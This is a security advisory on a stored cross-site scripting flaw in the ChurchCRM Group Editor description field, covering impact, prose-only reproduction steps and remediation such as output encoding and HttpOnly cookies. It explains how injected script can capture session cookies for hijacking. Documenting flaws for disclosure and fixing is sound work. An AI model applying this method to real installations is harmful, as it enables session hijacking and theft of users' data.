ChurchCRM Stored Cross-Site Scripting Vulnerability in Group Editor Allowing Session Hijacking

A stored cross-site scripting vulnerability has been identified in ChurchCRM versions through 5.13.0, specifically within the Group Editor page. This issue allows admin users to inject malicious JavaScript into the description field, which can capture the session cookies of authenticated users. Once obtained, these cookies can be sent to an external server, facilitating session hijacking. Additionally, this vulnerability could lead to unauthorized access to sensitive information by allowing attackers to impersonate users using the stolen session cookies.

Impact

Exploitation of this vulnerability allows for session hijacking, where an attacker can gain access to an authenticated user's session by capturing their session cookie. This not only enables unauthorized access to the user's account but also allows the attacker to access sensitive information as if they were the user. The vulnerability also introduces a cross-site scripting risk, as it involves the injection of malicious scripts that can be executed in the context of the user's browser.

Reproduction

To reproduce this vulnerability, navigate to the Group Editor page for a specific group. Inject a script payload into the description field that captures the session cookie, such as a script tag with JavaScript code. After submitting the form, the injected script will execute, demonstrating the cross-site scripting vulnerability by, for example, alerting the session cookie. This cookie can then be stolen and used for session hijacking.

Remediation

To address this vulnerability, ChurchCRM should implement output encoding to prevent the injection of malicious scripts in user-controlled input fields. Additionally, session cookies should be configured with the 'HttpOnly' and 'Secure' flags to restrict client-side access. Finally, user input should be validated and sanitized before being displayed on web pages.